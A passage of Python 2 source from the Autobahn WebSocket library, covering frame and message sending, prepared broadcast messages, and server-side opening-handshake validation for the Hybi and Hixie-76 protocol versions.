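## length 2), followed by the two payload octets.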
def sendPing(self, payload = None):
"""
Send out Ping to peer. A peer is expected to Pong back the payload as soon
as "practical". When more than 1 Ping is outstanding at a peer, the peer may
elect to respond only to the last Ping.
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PING (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 9, payload = payload)
else:
self.sendFrame(opcode = 9)
def sendPong(self, payload = None):
"""
Send out Pong to peer. A Pong frame MAY be sent unsolicited.
This serves as a unidirectional heartbeat. A response to an unsolicited pong is "not expected".
Modes: Hybi
:param payload: An optional, arbitrary payload of length < 126 octets.
:type payload: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if payload:
l = len(payload)
if l > 125:
raise Exception("invalid payload for PONG (payload length must be <= 125, was %d)" % l)
self.sendFrame(opcode = 10, payload = payload)
else:
self.sendFrame(opcode = 10)
def sendCloseFrame(self, code = None, reasonUtf8 = None, isReply = False):
"""
Send a close frame and update protocol state. Note that this is
an internal method which deliberately allows sending a close
frame with an invalid payload.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonUtf8 will be silently ignored.
"""
if self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("ignoring sendCloseFrame since connection already closed")
elif self.state in [WebSocketProtocol.STATE_PROXY_CONNECTING, WebSocketProtocol.STATE_CONNECTING]:
raise Exception("cannot close a connection not yet connected")
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.websocket_version == 0:
self.sendData("\xff\x00")
else:
## construct Hybi close frame payload and send frame
payload = ""
if code is not None:
payload += struct.pack("!H", code)
if reasonUtf8 is not None:
payload += reasonUtf8
self.sendFrame(opcode = 8, payload = payload)
## update state
self.state = WebSocketProtocol.STATE_CLOSING
self.closedByMe = not isReply
## remember payload of close frame we sent
self.localCloseCode = code
self.localCloseReason = reasonUtf8
## drop connection when timeout on receiving close handshake reply
if self.closedByMe and self.closeHandshakeTimeout > 0:
self.closeHandshakeTimeoutCall = reactor.callLater(self.closeHandshakeTimeout, self.onCloseHandshakeTimeout)
else:
raise Exception("logic error")
def sendClose(self, code = None, reason = None):
"""
Starts a closing handshake.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, code and reason will be silently ignored.
:param code: An optional close status code (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_NORMAL or 3000-4999).
:type code: int
:param reason: An optional close reason (a string); when present, a status code MUST also be present.
:type reason: str
"""
if code is not None:
if type(code) != int:
raise Exception("invalid type %s for close code" % type(code))
if code != 1000 and not (code >= 3000 and code <= 4999):
raise Exception("invalid close code %d" % code)
if reason is not None:
if code is None:
raise Exception("close reason without close code")
if type(reason) not in [str, unicode]:
raise Exception("invalid type %s for close reason" % type(reason))
reasonUtf8 = reason.encode("UTF-8")
if len(reasonUtf8) + 2 > 125:
raise Exception("close reason too long (%d)" % len(reasonUtf8))
else:
reasonUtf8 = None
self.sendCloseFrame(code = code, reasonUtf8 = reasonUtf8, isReply = False)
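## Illustrative usage sketch (not part of the library): initiating a clean close
## from application code, e.g. from within onMessage() of a derived protocol:
##
##   self.sendClose(WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, u"session finished")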
def beginMessage(self, opcode = MESSAGE_TYPE_TEXT):
"""
Begin sending new message.
Modes: Hybi, Hixie
:param opcode: Message type, normally either WebSocketProtocol.MESSAGE_TYPE_TEXT (default) or
WebSocketProtocol.MESSAGE_TYPE_BINARY (only Hybi mode).
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_GROUND:
raise Exception("WebSocketProtocol.beginMessage invalid in current sending state")
if self.websocket_version == 0:
if opcode != 1:
raise Exception("cannot send non-text message in Hixie mode")
self.sendData('\x00')
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
else:
if opcode not in [1, 2]:
raise Exception("use of reserved opcode %d" % opcode)
## remember opcode for later (when sending first frame)
##
self.send_message_opcode = opcode
self.send_state = WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN
def beginMessageFrame(self, length, reserved = 0, mask = None):
"""
Begin sending new message frame.
Modes: Hybi
:param length: Length of frame which is started. Must be >= 0 and <= 2^63.
:type length: int
:param reserved: Reserved bits for frame (an integer from 0 to 7). Note that reserved != 0 is only legal when an extension has been negotiated which defines their semantics.
:type reserved: int
:param mask: Optional frame mask. When given, this is used. When None and the peer is a client, a mask will be internally generated. For servers None is default.
:type mask: str
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state not in [WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN, WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE]:
raise Exception("WebSocketProtocol.beginMessageFrame invalid in current sending state")
if (not type(length) in [int, long]) or length < 0 or length > 0x7FFFFFFFFFFFFFFF: # 2**63
raise Exception("invalid value for message frame length")
if type(reserved) is not int or reserved < 0 or reserved > 7:
raise Exception("invalid value for reserved bits")
self.send_message_frame_length = length
if mask:
## explicit mask given
##
assert type(mask) == str
assert len(mask) == 4
self.send_message_frame_mask = mask
elif (not self.isServer and self.maskClientFrames) or (self.isServer and self.maskServerFrames):
## automatic mask:
## - client-to-server masking (if not deactivated)
## - server-to-client masking (if activated)
##
self.send_message_frame_mask = struct.pack("!I", random.getrandbits(32))
else:
## no mask
##
self.send_message_frame_mask = None
## payload masker
##
if self.send_message_frame_mask and length > 0 and self.applyMask:
self.send_message_frame_masker = createXorMasker(self.send_message_frame_mask, length)
else:
self.send_message_frame_masker = XorMaskerNull()
## first byte
##
b0 = (reserved % 8) << 4 # FIN = false .. since with streaming, we don't know when message ends
if self.send_state == WebSocketProtocol.SEND_STATE_MESSAGE_BEGIN:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
b0 |= self.send_message_opcode % 128
else:
pass # message continuation frame
## second byte, payload len bytes and mask
##
b1 = 0
if self.send_message_frame_mask:
b1 |= 1 << 7
mv = self.send_message_frame_mask
else:
mv = ""
el = ""
if length <= 125:
b1 |= length
elif length <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", length)
elif length <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", length)
else:
raise Exception("invalid payload length")
## write message frame header
##
header = ''.join([chr(b0), chr(b1), el, mv])
self.sendData(header)
## now we are inside message frame ..
##
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME
def sendMessageFrameData(self, payload, sync = False):
"""
Send out data when within message frame (message was begun, frame was begun).
      Note that the frame is automatically ended when enough data has been sent;
      that is, there is no endMessageFrame, since you began the frame by specifying
      the frame length, which implicitly defines the frame end. This is different from
messages, which you begin and end, since a message can contain an unlimited number
of frames.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Data to send.
:returns: int -- Hybi mode: when frame still incomplete, returns outstanding octets, when frame complete, returns <= 0, when < 0, the amount of unconsumed data in payload argument. Hixie mode: returns None.
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
## Hixie Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
self.sendData(payload, sync = sync)
return None
else:
## Hybi Mode
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE_FRAME:
raise Exception("WebSocketProtocol.sendMessageFrameData invalid in current sending state")
rl = len(payload)
if self.send_message_frame_masker.pointer() + rl > self.send_message_frame_length:
l = self.send_message_frame_length - self.send_message_frame_masker.pointer()
rest = -(rl - l)
pl = payload[:l]
else:
l = rl
rest = self.send_message_frame_length - self.send_message_frame_masker.pointer() - l
pl = payload
## mask frame payload
##
plm = self.send_message_frame_masker.process(pl)
## send frame payload
##
self.sendData(plm, sync = sync)
## if we are done with frame, move back into "inside message" state
##
if self.send_message_frame_masker.pointer() >= self.send_message_frame_length:
self.send_state = WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE
## when =0 : frame was completed exactly
         ## when >0 : frame is still incomplete and that many octets are still left to complete the frame
## when <0 : frame was completed and there was this much unconsumed data in payload argument
##
return rest
def endMessage(self):
"""
End a previously begun message. No more frames may be sent (for that message). You have to
begin a new message before sending again.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_OPEN:
return
## check if sending state is valid for this method
##
if self.send_state != WebSocketProtocol.SEND_STATE_INSIDE_MESSAGE:
raise Exception("WebSocketProtocol.endMessage invalid in current sending state [%d]" % self.send_state)
if self.websocket_version == 0:
self.sendData('\x00')
else:
self.sendFrame(opcode = 0, fin = True)
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
def sendMessageFrame(self, payload, reserved = 0, mask = None, sync = False):
"""
When a message has begun, send a complete message frame in one go.
Modes: Hybi
"""
if self.websocket_version == 0:
raise Exception("function not supported in Hixie-76 mode")
if self.state != WebSocketProtocol.STATE_OPEN:
return
self.beginMessageFrame(len(payload), reserved, mask)
self.sendMessageFrameData(payload, sync)
def sendMessage(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Send out a message in one go.
      You can send a text or binary message, and optionally specify a payload fragment size.
When the latter is given, the payload will be split up into frames with
payload <= the payload_frag_size given.
Modes: Hybi, Hixie
"""
if self.trackedTimings:
self.trackedTimings.track("sendMessage")
if self.state != WebSocketProtocol.STATE_OPEN:
return
if self.websocket_version == 0:
if binary:
raise Exception("cannot send binary message in Hixie76 mode")
if payload_frag_size:
raise Exception("cannot fragment messages in Hixie76 mode")
self.sendMessageHixie76(payload, sync)
else:
self.sendMessageHybi(payload, binary, payload_frag_size, sync)
def sendMessageHixie76(self, payload, sync = False):
"""
Hixie76-Variant of sendMessage().
Modes: Hixie
"""
self.sendData('\x00' + payload + '\xff', sync = sync)
def sendMessageHybi(self, payload, binary = False, payload_frag_size = None, sync = False):
"""
Hybi-Variant of sendMessage().
Modes: Hybi
"""
## (initial) frame opcode
##
if binary:
opcode = 2
else:
opcode = 1
      ## an explicit payload_frag_size argument overrides the autoFragmentSize setting
##
if payload_frag_size is not None:
pfs = payload_frag_size
else:
if self.autoFragmentSize > 0:
pfs = self.autoFragmentSize
else:
pfs = None
## send unfragmented
##
if pfs is None or len(payload) <= pfs:
self.sendFrame(opcode = opcode, payload = payload, sync = sync)
## send data message in fragments
##
else:
if pfs < 1:
raise Exception("payload fragment size must be at least 1 (was %d)" % pfs)
n = len(payload)
i = 0
done = False
first = True
while not done:
j = i + pfs
if j > n:
done = True
j = n
if first:
self.sendFrame(opcode = opcode, payload = payload[i:j], fin = done, sync = sync)
first = False
else:
self.sendFrame(opcode = 0, payload = payload[i:j], fin = done, sync = sync)
i += pfs
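

## Illustrative sketch (not part of the library): sending one large binary message
## with the frame-based API above, from application code that already holds an
## open WebSocketProtocol instance (Hybi mode only). The function name and the
## 'chunks' iterable are assumptions made for this example; the calls themselves
## are the beginMessage / beginMessageFrame / sendMessageFrameData / endMessage
## methods defined above.
def _exampleSendChunkedMessage(proto, chunks):
   """
   Send an iterable of byte strings as a single binary WebSocket message,
   one frame per chunk.
   """
   proto.beginMessage(opcode = WebSocketProtocol.MESSAGE_TYPE_BINARY)
   for chunk in chunks:
      ## each chunk becomes one frame; the frame ends automatically once
      ## len(chunk) octets have been written via sendMessageFrameData()
      proto.beginMessageFrame(len(chunk))
      proto.sendMessageFrameData(chunk)
   proto.endMessage()
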
class PreparedMessage:
"""
Encapsulates a prepared message to be sent later once or multiple
times. This is used for optimizing Broadcast/PubSub.
The message serialization formats currently created internally are:
* Hybi
* Hixie
The construction of different formats is needed, since we support
mixed clients (speaking different protocol versions).
It will also be the place to add a 3rd format, when we support
the deflate extension, since then, the clients will be mixed
between Hybi-Deflate-Unsupported, Hybi-Deflate-Supported and Hixie.
"""
def __init__(self, payload, binary, masked):
"""
Ctor for a prepared message.
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be masked (required for client to server WebSocket messages).
:type masked: bool
"""
self._initHixie(payload, binary)
self._initHybi(payload, binary, masked)
def _initHixie(self, payload, binary):
if binary:
# silently filter out .. probably do something else:
# base64?
# dunno
self.payloadHixie = ''
else:
self.payloadHixie = '\x00' + payload + '\xff'
def _initHybi(self, payload, binary, masked):
l = len(payload)
## first byte
##
b0 = ((1 << 7) | 2) if binary else ((1 << 7) | 1)
## second byte, payload len bytes and mask
##
if masked:
b1 = 1 << 7
mask = struct.pack("!I", random.getrandbits(32))
if l == 0:
plm = payload
else:
plm = createXorMasker(mask, l).process(payload)
else:
b1 = 0
mask = ""
plm = payload
## payload extended length
##
el = ""
if l <= 125:
b1 |= l
elif l <= 0xFFFF:
b1 |= 126
el = struct.pack("!H", l)
elif l <= 0x7FFFFFFFFFFFFFFF:
b1 |= 127
el = struct.pack("!Q", l)
else:
raise Exception("invalid payload length")
## raw WS message (single frame)
##
self.payloadHybi = ''.join([chr(b0), chr(b1), el, mask, plm])
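
## Illustrative worked example (not part of the library), following the framing
## logic of _initHybi() above: for the two-byte text payload "hi", sent unmasked,
##    b0 = (1 << 7) | 1 = 0x81   (FIN set, text opcode)
##    b1 = 0 | 2        = 0x02   (no mask bit, payload length 2, no extended length)
## so PreparedMessage("hi", binary = False, masked = False).payloadHybi
## equals '\x81\x02hi'.
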
class WebSocketFactory:
"""
Mixin for
:class:`autobahn.websocket.WebSocketClientFactory` and
:class:`autobahn.websocket.WebSocketServerFactory`.
"""
def prepareMessage(self, payload, binary = False, masked = None):
"""
Prepare a WebSocket message. This can be later used on multiple
instances of :class:`autobahn.websocket.WebSocketProtocol` using
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`.
By doing so, you can avoid the (small) overhead of framing the
*same* payload into WS messages when that payload is to be sent
out on multiple connections.
Caveats:
1. Only use when you know what you are doing. I.e. calling
:meth:`autobahn.websocket.WebSocketProtocol.sendPreparedMessage`
on the *same* protocol instance multiples times with the *same*
prepared message might break the spec, since i.e. the frame mask
will be the same!
2. Treat the object returned as opaque. It may change!
Modes: Hybi, Hixie
:param payload: The message payload.
:type payload: str
:param binary: Provide `True` for binary payload.
:type binary: bool
:param masked: Provide `True` if WebSocket message is to be
masked (required for client-to-server WebSocket messages).
:type masked: bool
:returns: obj -- The prepared message.
"""
if masked is None:
masked = not self.isServer
return PreparedMessage(payload, binary, masked)
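

## Illustrative sketch (not part of the library): broadcasting one payload to many
## open connections using prepareMessage() above. The function name and the
## 'connections' argument are assumptions for this example; sendPreparedMessage()
## is the protocol-side counterpart referenced in the docstring above (defined
## earlier in this module).
def _exampleBroadcast(factory, connections, payload):
   """
   Serialize 'payload' once and send it over every protocol instance
   in 'connections'.
   """
   msg = factory.prepareMessage(payload, binary = False)
   for proto in connections:
      ## the pre-framed message is reused, avoiding per-connection re-framing
      proto.sendPreparedMessage(msg)
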
class WebSocketServerProtocol(WebSocketProtocol):
"""
A Twisted protocol for WebSocket servers.
"""
def onConnect(self, connectionRequest):
"""
Callback fired during WebSocket opening handshake when new WebSocket client
connection is about to be established.
Throw HttpException when you don't want to accept the WebSocket
connection request. For example, throw a
`HttpException(httpstatus.HTTP_STATUS_CODE_UNAUTHORIZED[0], "You are not authorized for this!")`.
When you want to accept the connection, return the accepted protocol
from list of WebSocket (sub)protocols provided by client or None to
speak no specific one or when the client list was empty.
You may also return a pair of `(protocol, headers)` to send additional HTTP `headers`.
:param connectionRequest: WebSocket connection request information.
:type connectionRequest: instance of :class:`autobahn.websocket.ConnectionRequest`
"""
return None
def connectionMade(self):
"""
Called by Twisted when new TCP connection from client was accepted. Default
implementation will prepare for initial WebSocket opening handshake.
When overriding in derived class, make sure to call this base class
implementation *before* your code.
"""
self.isServer = True
WebSocketProtocol.connectionMade(self)
self.factory.countConnections += 1
if self.debug:
log.msg("connection accepted from peer %s" % self.peerstr)
def connectionLost(self, reason):
"""
Called by Twisted when established TCP connection from client was lost. Default
implementation will tear down all state properly.
When overriding in derived class, make sure to call this base class
implementation *after* your code.
"""
WebSocketProtocol.connectionLost(self, reason)
self.factory.countConnections -= 1
if self.debug:
log.msg("connection from %s lost" % self.peerstr)
def processProxyConnect(self):
raise Exception("Autobahn isn't a proxy server")
def parseHixie76Key(self, key):
"""
Parse Hixie76 opening handshake key provided by client.
"""
return int(filter(lambda x: x.isdigit(), key)) / key.count(" ")
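      ## note: e.g. a key whose digit characters concatenate to "1234" and which
      ## contains two space characters yields 1234 / 2 == 617 (illustrative values,
      ## not taken from the spec)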
def processHandshake(self):
"""
Process WebSocket opening handshake request from client.
"""
## only proceed when we have fully received the HTTP request line and all headers
##
end_of_header = self.data.find("\x0d\x0a\x0d\x0a")
if end_of_header >= 0:
self.http_request_data = self.data[:end_of_header + 4]
if self.debug:
log.msg("received HTTP request:\n\n%s\n\n" % self.http_request_data)
## extract HTTP status line and headers
##
(self.http_status_line, self.http_headers, http_headers_cnt) = parseHttpHeader(self.http_request_data)
## validate WebSocket opening handshake client request
##
if self.debug:
log.msg("received HTTP status line in opening handshake : %s" % str(self.http_status_line))
log.msg("received HTTP headers in opening handshake : %s" % str(self.http_headers))
## HTTP Request line : METHOD, VERSION
##
rl = self.http_status_line.split()
if len(rl) != 3:
return self.failHandshake("Bad HTTP request status line '%s'" % self.http_status_line)
if rl[0].strip() != "GET":
return self.failHandshake("HTTP method '%s' not allowed" % rl[0], HTTP_STATUS_CODE_METHOD_NOT_ALLOWED[0])
vs = rl[2].strip().split("/")
if len(vs) != 2 or vs[0] != "HTTP" or vs[1] not in ["1.1"]:
return self.failHandshake("Unsupported HTTP version '%s'" % rl[2], HTTP_STATUS_CODE_UNSUPPORTED_HTTP_VERSION[0])
## HTTP Request line : REQUEST-URI
##
self.http_request_uri = rl[1].strip()
try:
(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(self.http_request_uri)
## FIXME: check that if absolute resource URI is given,
## the scheme/netloc matches the server
if scheme != "" or netloc != "":
pass
## Fragment identifiers are meaningless in the context of WebSocket
## URIs, and MUST NOT be used on these URIs.
if fragment != "":
return self.failHandshake("HTTP requested resource contains a fragment identifier '%s'" % fragment)
## resource path and query parameters .. this will get forwarded
## to onConnect()
self.http_request_path = path
self.http_request_params = urlparse.parse_qs(query)
except:
return self.failHandshake("Bad HTTP request resource - could not parse '%s'" % rl[1].strip())
## Host
##
if not self.http_headers.has_key("host"):
return self.failHandshake("HTTP Host header missing in opening handshake request")
if http_headers_cnt["host"] > 1:
return self.failHandshake("HTTP Host header appears more than once in opening handshake request")
self.http_request_host = self.http_headers["host"].strip()
if self.http_request_host.find(":") >= 0:
(h, p) = self.http_request_host.split(":")
try:
port = int(str(p.strip()))
except:
return self.failHandshake("invalid port '%s' in HTTP Host header '%s'" % (str(p.strip()), str(self.http_request_host)))
if port != self.factory.externalPort:
return self.failHandshake("port %d in HTTP Host header '%s' does not match server listening port %s" % (port, str(self.http_request_host), self.factory.externalPort))
self.http_request_host = h
else:
if not ((self.factory.isSecure and self.factory.externalPort == 443) or (not self.factory.isSecure and self.factory.externalPort == 80)):
return self.failHandshake("missing port in HTTP Host header '%s' and server runs on non-standard port %d (wss = %s)" % (str(self.http_request_host), self.factory.externalPort, self.factory.isSecure))
## Upgrade
##
if not self.http_headers.has_key("upgrade"):
## When no WS upgrade, render HTML server status page
##
if self.webStatus:
if self.http_request_params.has_key('redirect') and len(self.http_request_params['redirect']) > 0:
                  ## To specify a URL for redirection, encode the URL, i.e. from JavaScript:
##
## var url = encodeURIComponent("http://autobahn.ws/python");
##
## and append the encoded string as a query parameter 'redirect'
##
## http://localhost:9000?redirect=http%3A%2F%2Fautobahn.ws%2Fpython
## https://localhost:9000?redirect=https%3A%2F%2Ftwitter.com%2F
##
## This will perform an immediate HTTP-303 redirection. If you provide
## an additional parameter 'after' (int >= 0), the redirection happens
## via Meta-Refresh in the rendered HTML status page, i.e.
##
## https://localhost:9000/?redirect=https%3A%2F%2Ftwitter.com%2F&after=3
##
url = self.http_request_params['redirect'][0]
if self.http_request_params.has_key('after') and len(self.http_request_params['after']) > 0:
after = int(self.http_request_params['after'][0])
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page and meta-refresh-redirecting to %s after %d seconds" % (url, after))
self.sendServerStatus(url, after)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : 303-redirecting to %s" % url)
self.sendRedirect(url)
else:
if self.debugCodePaths:
log.msg("HTTP Upgrade header missing : render server status page")
self.sendServerStatus()
self.dropConnection(abort = False)
return
else:
return self.failHandshake("HTTP Upgrade header missing", HTTP_STATUS_CODE_UPGRADE_REQUIRED[0])
upgradeWebSocket = False
for u in self.http_headers["upgrade"].split(","):
if u.strip().lower() == "websocket":
upgradeWebSocket = True
break
if not upgradeWebSocket:
return self.failHandshake("HTTP Upgrade headers do not include 'websocket' value (case-insensitive) : %s" % self.http_headers["upgrade"])
## Connection
##
if not self.http_headers.has_key("connection"):
return self.failHandshake("HTTP Connection header missing")
connectionUpgrade = False
for c in self.http_headers["connection"].split(","):
if c.strip().lower() == "upgrade":
connectionUpgrade = True
break
if not connectionUpgrade:
return self.failHandshake("HTTP Connection headers do not include 'upgrade' value (case-insensitive) : %s" % self.http_headers["connection"])
## Sec-WebSocket-Version PLUS determine mode: Hybi or Hixie
##
if not self.http_headers.has_key("sec-websocket-version"):
if self.debugCodePaths:
log.msg("Hixie76 protocol detected")
if self.allowHixie76:
version = 0
else:
return self.failHandshake("WebSocket connection denied - Hixie76 protocol mode disabled.")
else:
if self.debugCodePaths:
log.msg("Hybi protocol detected")
if http_headers_cnt["sec-websocket-version"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Version header appears more than once in opening handshake request")
try:
version = int(self.http_headers["sec-websocket-version"])
except:
return self.failHandshake("could not parse HTTP Sec-WebSocket-Version header '%s' in opening handshake request" % self.http_headers["sec-websocket-version"])
if version not in self.versions:
## respond with list of supported versions (descending order)
##
sv = sorted(self.versions)
sv.reverse()
svs = ','.join([str(x) for x in sv])
return self.failHandshake("WebSocket version %d not supported (supported versions: %s)" % (version, svs),
HTTP_STATUS_CODE_BAD_REQUEST[0],
[("Sec-WebSocket-Version", svs)])
else:
## store the protocol version we are supposed to talk
self.websocket_version = version
## Sec-WebSocket-Protocol
##
if self.http_headers.has_key("sec-websocket-protocol"):
protocols = [str(x.strip()) for x in self.http_headers["sec-websocket-protocol"].split(",")]
# check for duplicates in protocol header
pp = {}
for p in protocols:
if pp.has_key(p):
return self.failHandshake("duplicate protocol '%s' specified in HTTP Sec-WebSocket-Protocol header" % p)
else:
pp[p] = 1
# ok, no duplicates, save list in order the client sent it
self.websocket_protocols = protocols
else:
self.websocket_protocols = []
## Origin / Sec-WebSocket-Origin
## http://tools.ietf.org/html/draft-ietf-websec-origin-02
##
if self.websocket_version < 13 and self.websocket_version != 0:
# Hybi, but only < Hybi-13
websocket_origin_header_key = 'sec-websocket-origin'
else:
# RFC6455, >= Hybi-13 and Hixie
websocket_origin_header_key = "origin"
self.websocket_origin = None
if self.http_headers.has_key(websocket_origin_header_key):
if http_headers_cnt[websocket_origin_header_key] > 1:
return self.failHandshake("HTTP Origin header appears more than once in opening handshake request")
self.websocket_origin = self.http_headers[websocket_origin_header_key].strip()
else:
# non-browser clients are allowed to omit this header
pass
## Sec-WebSocket-Extensions
##
## extensions requested by client
self.websocket_extensions = []
## extensions selected by server
self.websocket_extensions_in_use = []
if self.http_headers.has_key("sec-websocket-extensions"):
if self.websocket_version == 0:
return self.failHandshake("Sec-WebSocket-Extensions header specified for Hixie-76")
extensions = [x.strip() for x in self.http_headers["sec-websocket-extensions"].split(',')]
if len(extensions) > 0:
self.websocket_extensions = extensions
if self.debug:
log.msg("client requested extensions we don't support (%s)" % str(extensions))
## Sec-WebSocket-Key (Hybi) or Sec-WebSocket-Key1/Sec-WebSocket-Key2 (Hixie-76)
##
if self.websocket_version == 0:
for kk in ['Sec-WebSocket-Key1', 'Sec-WebSocket-Key2']:
k = kk.lower()
if not self.http_headers.has_key(k):
return self.failHandshake("HTTP %s header missing" % kk)
if http_headers_cnt[k] > 1:
return self.failHandshake("HTTP %s header appears more than once in opening handshake request" % kk)
try:
key1 = self.parseHixie76Key(self.http_headers["sec-websocket-key1"].strip())
key2 = self.parseHixie76Key(self.http_headers["sec-websocket-key2"].strip())
except:
return self.failHandshake("could not parse Sec-WebSocket-Key1/2")
else:
if not self.http_headers.has_key("sec-websocket-key"):
return self.failHandshake("HTTP Sec-WebSocket-Key header missing")
if http_headers_cnt["sec-websocket-key"] > 1:
return self.failHandshake("HTTP Sec-WebSocket-Key header appears more than once in opening handshake request")
key = self.http_headers["sec-websocket-key"].strip()
if len(key) != 24: # 16 bytes => (ceil(128/24)*24)/6 == 24
return self.failHandshake("bad Sec-WebSocket-Key (length must be 24 ASCII chars) '%s'" % key)
if key[-2:] != "==": # 24 - ceil(128/6) == 2
return self.failHandshake("bad Sec-WebSocket-Key (invalid base64 encoding) '%s'" % key)
for c in key[:-2]:
if c not in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/":
                  return self.failHandshake("bad character '%s' in Sec-WebSocket-Key (invalid base64 encoding) '%s'" % (c, key))
## For Hixie-76, we need 8 octets of HTTP request body to complete HS!
##
if self.websocket_version == 0:
if len(self.data) < end_of_header + 4 + 8:
return
else:
key3 = self.data[end_of_header + 4:end_of_header + 4 + 8]
if self.debug:
log.msg("received HTTP request body containing key3 for Hixie-76: %s" % key3)
## Ok, got complete HS input, remember rest (if any)
##
if self.websocket_version == 0:
self.data = self.data[end_of_header + 4 + 8:]
else:
self.data = self.data[end_of_header + 4:]
## WebSocket handshake validated => produce opening handshake response
## Now fire onConnect() on derived class, to give that class a chance to accept or deny
## the connection. onConnect() may throw, in which case the connection is denied, or it
## may return a protocol from the protocols provided by client or None.
##
try:
connectionRequest = ConnectionRequest(self.peer,
self.peerstr,
self.http_headers,
self.http_request_host,
self.http_request_path,
self.http_request_params,
self.websocket_version,
self.websocket_origin,
self.websocket_protocols,
self.websocket_extensions)
## onConnect() will return the selected subprotocol or None
## or a pair (protocol, headers) or raise an HttpException
##
protocol = None
headers = {}
res = self.onConnect(connectionRequest)
if type(res) == tuple:
if len(res) > 0:
protocol = res[0]
if len(res) > 1:
headers = res[1]
else:
protocol = res
if protocol is not None and not (protocol in self.websocket_protocols):
raise Exception("protocol accepted must be from the list client sent or None")
self.websocket_protocol_in_use = protocol
except HttpException, e:
return self.failHandshake(e.reason, e.code)
#return self.sendHttpRequestFailure(e.code, e.reason)
except Exception, e:
log.msg("Exception raised in onConnect() - %s" % str(e))
return self.failHandshake("Internal Server Error", HTTP_STATUS_CODE_INTERNAL_SERVER_ERROR[0])
## build response to complete WebSocket handshake
##
response = "HTTP/1.1 %d Switching Protocols\x0d\x0a" % HTTP_STATUS_CODE_SWITCHING_PROTOCOLS[0]
if self.factory.server is not None and self.factory.server != "":
response += "Server: %s\x0d\x0a" % self.factory.server.encode("utf-8")
response += "Upgrade: WebSocket\x0d\x0a"
response += "Connection: Upgrade\x0d\x0a"
## optional, user supplied additional HTTP headers
##
## headers from factory
for uh in self.factory.headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
## headers from onConnect
for uh in headers.items():
response += "%s: %s\x0d\x0a" % (uh[0].encode("utf-8"), uh[1].encode("utf-8"))
if self.websocket_protocol_in_use is not None:
response += "Sec-WebSocket-Protocol: %s\x0d\x0a" % str(self.websocket_protocol_in_use)
if self.websocket_version == 0:
if self.websocket_origin:
               ## browser clients provide the header and expect it to be echoed back
response += "Sec-WebSocket-Origin: %s\x0d\x0a" % str(self.websocket_origin)
if self.debugCodePaths:
log.msg('factory isSecure = %s port = %s' % (self.factory.isSecure, self.factory.externalPort))
if (self.factory.isSecure and self.factory.externalPort != 443) or ((not self.factory.isSecure) and self.factory.externalPort != 80):
if self.debugCodePaths:
log.msg('factory running on non-default port')
response_port = ':' + str(self.factory.externalPort)
else:
if self.debugCodePaths:
log.msg('factory running on default port')
response_port = ''
## FIXME: check this! But see below ..
if False:
response_host = str(self.factory.host)
response_path = str(self.factory.path)
else:
response_host = str(self.http_request_host)
response_path = str(self.http_request_uri)
location = "%s://%s%s%s" % ('wss' if self.factory.isSecure else 'ws', response_host, response_port, response_path)
# Safari is very picky about this one
response += "Sec-WebSocket-Location: %s\x0d\x0a" % location
## end of HTTP response headers
response += "\x0d\x0a"
## compute accept body
##
accept_val = struct.pack(">II", key1, key2) + key3
accept = hashlib.md5(accept_val).digest()
response_body = str(accept)
else:
## compute Sec-WebSocket-Accept
##
sha1 = hashlib.sha1()
sha1.update(key + WebSocketProtocol._WS_MAGIC)
sec_websocket_accept = base64.b64encode(sha1.digest())
response += "Sec-WebSocket-Accept: %s\x0d\x0a" % sec_websocket_accept
if len(self.websocket_extensions_in_use) > 0:
response += "Sec-WebSocket-Extensions: %s\x0d\x0a" % ','.join(self.websocket_extensions_in_use)
## end of HTTP response headers
response += "\x0d\x0a"
response_body = ''
if self.debug:
